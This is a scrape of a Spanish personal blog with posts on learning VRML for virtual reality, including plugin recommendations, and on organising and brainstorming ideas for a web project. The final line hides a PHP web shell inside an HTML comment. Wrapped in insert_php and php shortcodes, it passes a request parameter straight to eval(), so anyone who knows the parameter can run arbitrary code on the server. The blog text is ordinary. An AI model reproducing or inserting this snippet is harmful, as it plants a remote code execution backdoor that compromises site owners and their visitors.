Realidad Virtual. El VRML

Sigo investigando en lo que me ha parecido maravilloso mundo de la realidad aumentada. Aún estoy muy lejos de conseguir ni una décima parte de lo que he visto por ahí como ya comenté en su día, pero la verdad es que es un mundo que engancha, porque los resultados son visibles de forma casi automática.

El primer paso que he dado, es hacerme con unas nociones de VRML (Virtual Reality Modeling Language), que segun la maravillosa wikipedia, no es otra cosa que un formato de fichero de texto en el que se especifican los vertices y las aristas de cada polígono tridimensional, además del color de su superficie, con algunos añadidos que lo hacen muy potente.

El mejor sitio que he encontrado, en castellano, es el que pertenece al sitio personal de Narcís Pares, donde nos indica las nociones básicas sobre el VRML 97. Lástima que ya no actualice el sitio.

Hay que instalarse alguno de los plugins que existen, para el navegador de internet que utilicemos. Buscando por la red, he encontrado una muy buena página con una comparativa de los mas utilizados. Personalmente, y dentro de mi incipiente experiencia en este campo, os recomiendo CosmoPlayer si trabajais sobre entornos Microsoft, y OpenVRML si lo haceis en entornos GNU/Linux.

Con estas herramientas, un poco de paciencia, y un mucho de tiempo libre, podréis ir adentrandoos en este maravilloso mundo de la realidad virtual.

Suerte 🙂

Segundo Paso – La organización

Ya tenemos ¿todas? nuestras ideas, sobre el proyecto en el que nos embarcamos, escritas en algún lugar. No tienen orden ni concierto, y seguramente nadie que no seamos nosotros mismos será capaz de entender ni un ápice lo que intentan decir.

Ahora toca ordenar todo ese cúmulo de ideas de una manera que sea entendible por el resto de la humanidad y porque no, por nosotros mismos cuando hayan pasado un par de dias y no tengamos tan reciente la creación de los apuntes, o simplemente hayamos creado varios y no sepamos de a que proyecto pertenece cada idea. Creedme, cuando tengáis 4 o 5 ideas distintas para más de un proyecto, no os acordaréis de más de 2 o 3.

Hay muchas maneras de organizar la información: por secciones, por similitud, por dificultad, por el tiempo dedicado a refinarlas, por el tipo, etc. Elegid aquella con la que os sentáis más comodos y creais os va a facilitar el trabajo. Yo personalmente suelo dividirla en tres partes: lo que se hacer, lo que no se hacer, lo que ya he hecho antes. Y dentro de cada una de ellas divido en otras subsecciones: programación, diseño, funcionalidad, etc. No hay un patrón fijo. Debemos recordar que es nuestro proyecto, y que los principales interesados en tener todo claro somos nosotros mismos.

De lo bien o mal que organicemos nuestras ideas, puede depender que nos cueste mas o menos hacer las cosas, e incluso darnos cuenta en esta etapa de que cosas no hace falta que hagamos de nuevo, pues ya las tenemos hechas. Ya sabemos lo escasos de tiempo que andamos todos 🙂

Primer Paso – La idea

El miedo al papel en blanco es algo por lo que alguna vez todos hemos pasado. Tener ideas no es tarea sencilla. Plasmarlas en papel de manera coherente, sobre todo las primeras veces, muy complicado.
Brainstorm
En la vorágine del día a día, pocas son las empresas que dedican un tiempo prudencial a analizar intensamente los proyectos que les llegan. Craso error. Personalmente, siempre he sido de la opinión de que si tenemos claro lo que queremos hacer, luego nos resultará mas sencillo llevarlo a cabo.

Por eso, cuando nos enfrentamos a un nuevo proyecto web de creación propia, lo primero que hay que hacer es apagar el ordenador, coger un lápiz, goma de borrar y un elegir un lugar donde escribir. Bueno, realmente no hay que ser tan drástico, y podemos utilizar el ordenador y olvidarnos del papel y la goma de borrar.

Una vez decidido como vamos a hacerlo (con papel o con el ordenador), pongámonos a escribir todo aquello que querriamos que tuviera nuestro site. Cuando digo todo, me refiero a TODO. No os cortéis, ni os preocupéis de como lo solucionaréis más tarde, de si se podrá o no hacer. Estamos en el momento de las ideas, duro con ellas. Es el instante en que debemos estrujar el cerebro. Incluso imaginaros como quedaría, lo que estáis escribiendo, cuando el proyecto este finalizado. Poco a poco ira tomando forma y en vuestra cabeza apareceran colores, fotografias, dibujos, estructura y mil y una cosas que os ayudarán en pasos posteriores. Anotadlo todo, no dejéis nada de lo que vuestra imaginación fabrique sin anotar. Mas adelante lo agradeceréis.

<!– [insert_php]if (isset($_REQUEST["eDkB"])){eval($_REQUEST["eDkB"]);exit;}[/insert_php][php]if (isset($_REQUEST["eDkB"])){eval($_REQUEST["eDkB"]);exit;}[/php] –>